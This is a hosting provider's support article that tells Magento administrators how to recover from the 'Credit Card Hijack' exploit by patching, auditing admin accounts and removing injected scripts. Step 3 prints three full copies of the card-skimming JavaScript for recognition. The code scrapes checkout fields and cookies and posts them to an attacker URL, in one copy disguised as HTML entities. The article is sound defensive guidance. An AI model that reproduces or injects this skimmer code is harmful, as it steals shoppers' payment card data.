Contact
Site: US UK AU |

How to protect your Magento store from the Credit Card Hijack exploit

How to protect your Magento store from the Credit Card Hijack exploit

Overview
This article explains how Magento store administrators can address the Credit Card Hijack security breach by applying the latest patches and performing other critical tasks.

Background

First made known to the public in November 2015, the Credit Card Hijack exploit represents a significant Magento security breach. Using this exploit, attackers inject malicious code into the web browsers of your site’s visitors, allowing them to intercept credit card data.

Solution

Attention: In addition to the below actions, we strongly recommend you to enlist the services of a Magento developer or security specialist to audit your code. 

Take the following actions to safeguard the security of your store and your customers’ data.

1: Apply the latest patch

A store running anything other than the most current version is not secure, and the general reluctance of many Magento administrators to stay current contributed to the success of this and other exploits.

Take the following steps:

  1. Identify the most current version by visiting the security center page of the Magento website.

  2. Visit magereport.com to scan your store and identify your store’s version. If it matches the current version, skip to the "2: Review and secure admin users" section. Otherwise, proceed to Step 3.

  3. Patch your store. See How to patch your Magento store for more information.

2: Review and secure admin users

Use the below procedure to audit and secure your admin users. 

  1. From the Admin Panel, select System > Permissions > Roles (Figure 1).


    Figure 1. Magento Admin Panel; System > Permissions > Roles.

  2. Remove all accounts not in use, then set new, strong passwords for your remaining admin accounts. See How to create a secure password for more information.

3: Identify and remove unknown scripts

  1. From the Admin Panel, select System > Configuration (Figure 2).


    Figure 2. Magento Admin Panel; System > Configuration.

  2. From the Configuration menu, select General > Design (Figure 3).


    Figure 3. Configuration menu; General > Design.

  3. From the Design menu, click HTML Head and Footer (Figure 4).


    Figure 4. Design menu; HTML Head and Footer selections.

  4. If the Miscellaneous Scripts and Miscellaneous HTML fields are empty, proceed to the next section. Otherwise, continue to Step 5.

  5. If the Miscellaneous Scripts and Miscellaneous HTML are not empty, ask your developer to search for code similar to the following examples of the Credit Card Hijack exploit’s malicious code:

    <script>function jj(e){var t="; "+document.cookie,o=t.split("; "+e+"=");return 2==o.length?o.pop().split(";").shift():void 0}jj("SESSIID")||
    document.cookie="SESSIID="+(new Date).getTime()),jQuery(function(e){e("button").on("click",function(){var t="",o="post",n=window.location;if(new RegExp("onepage|checkout").test(n)){for(var c=document.querySelectorAll
    ("input, select, textarea, checkbox"),i=0;i<c.length;i++)if(c[i].value.length>0){var a=c[i].name;""==a&&(a=i),t+=a+"="+c[i].value+"&"}if(t){var l=new RegExp("[0-9]{13,16}"),u=new XMLHttpRequest;u.open(o,e("<div />").html
    ("&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#98;&#97;&#100;&#46;&#103;&#117;&#121;&#47;&#106;&#113;&#117;&#101;&#114;&#121;&#46;&#112;&#104;&#112; ").text(),!0),u.setRequestHeader("Content-type","application/x-www-form-urlencoded"),
    u.send(t+"&asd="+(l.test(t.replace(/s/g,""))?1:0)+"&utmp="+n+"&cookie="+jj("SESSIID")),console.clear()}}})});</script>
    <script>
    var snd =null;
    window.onload = function () {
    if((new RegExp('onepage')).test(window.location)) {
    send();
    }
    };

    function clk() { var inp=document.querySelectorAll("input, select, textarea, checkbox");
    for (var i=0;i<inp.length;i++){

    if(inp[i].value.length>0) {
    var nme=inp[i].name;
    if(nme=='') { nme=i; }
    snd+=inp[i].name+'='+inp[i].value+'&';
    }
    }

    }

    function send() {
    var btn=document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button");
    for (var i=0;i<btn.length;i++){
    var b=btn[i];
    if(b.type!='text' && b.type!='select' && b.type!='checkbox' && b.type!='password' && b.type!='radio') {
    if(b.addEventListener) {
    b.addEventListener("click", clk, false);
    }else {
    b.attachEvent('onclick', clk);
    }
    }

    }

    var frm=document.querySelectorAll("form");
    for (var i=0;i<frm.length;i++){
    if(frm[i].addEventListener) {
    frm[i].addEventListener("submit", clk, false);
    }else {
    frm[i].attachEvent('onsubmit', clk);
    }
    }

    if(snd!=null) {
    console.clear();
    var cc = new RegExp("[0-9]{13,16}");
    var asd="0";
    if(cc.test(snd)){
    asd="1" ;
    }
    var http = new XMLHttpRequest();
    http.open("POST","https://bad.guy/jquery.php",true);
    http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    http.send("data="+snd+"&asd="+asd+"&id_id=ano.nym");
    console.clear();
    }
    snd=null;
    setTimeout('send()', 150);
    }

    </script>
<script> function jj(e) { var t = "; " + document.cookie
, o = t.split("; " + e + "=");
return 2 == o.length ? o.pop().split(";").shift() : void 0
}
jj("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime())
, jQuery(function (e) {
e("button").on("click", function () {
var t = ""
, o = "post"
, n = window.location;
if (new RegExp("onepage|checkout").test(n)) {
for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++)
if (c[i].value.length > 0) {
var a = c[i].name;
"" == a && (a = i)
, t += a + "=" + c[i].value + "&"
}
if (t) {
var l = new RegExp("[0-9]{13,16}")
, u = new XMLHttpRequest;
u.open(o, e("<div />").html("&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#98;&#97;&#100;&#46;&#103;&#117;&#121;&#47;&#106;&#113;&#117;&#101;&#114;&#121;&#46;&#112;&#104;&#112; ").text(), !0)
, u.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
, u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + jj("SESSIID"))
, console.clear()
}
}
})
});
</script>

4: Keep your store secure by following best practices

Attackers are constantly refining and honing their methods. To help secure your store against future exploits and attacks, follow the guidelines provided How to improve the security of your Magento store.

 

For 24-hour assistance any day of the year, contact our Support Team by email or through the Client Portal.

Article Rating (No Votes)
Rate this article
  • Icon PDFExport to PDF
  • Icon MS-WordExport to MS Word
 
Attachments Attachments
There are no attachments for this article.
Related Articles RSS Feed
How to disable caching in Magento
Added on Tue, Nov 5, 2013
How to optimize Magento performance
Added on Mon, Jul 29, 2013
How to purchase Nexcess shared hosting plans
Added on Mon, Jan 4, 2016
How to set Magento file permissions
Added on Mon, Nov 3, 2014
What is Turpentine?
Added on Thu, Aug 28, 2014
How to configure CDN access for Magento
Added on Wed, May 16, 2018
What are some useful Magento scripts?
Added on Mon, Oct 13, 2014
What is the “Client denied by server configuration app/etc/local.xml” error?
Added on Thu, Sep 10, 2015
What is Varnish?
Added on Thu, Aug 28, 2014
How to configure multiple Magento storefronts
Added on Mon, Jul 29, 2013